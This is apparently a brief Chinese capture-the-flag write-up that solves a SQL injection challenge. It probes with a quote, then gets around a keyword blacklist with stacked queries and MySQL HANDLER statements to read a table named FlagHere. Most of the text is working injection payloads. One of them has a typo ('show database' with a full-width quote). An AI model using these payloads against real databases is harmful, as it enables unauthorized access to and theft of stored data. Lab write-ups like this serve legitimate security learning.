先打开环境,输入1时有回显,输入0时没有回显,输入1'时出现了报错,那就存在注入
构造playload:
1' union select 1,2#
看到他的黑名单,好多都过滤了,这儿使用堆叠注入和handler函数
构造playload:爆出数据库
1’;show database;#
继续构造playload:爆出表名
1'; show tables;#
看到了一个表名FlagHere,接下来使用Handler函数
构造playload:
1'; handler FlagHere open;handler FlagHere read first;handler FlagHere close;#
得到flag
handler FlagHere open 打开这个表
handler FlagHere read first 读取这个表的内容
handler FlagHere close 关闭表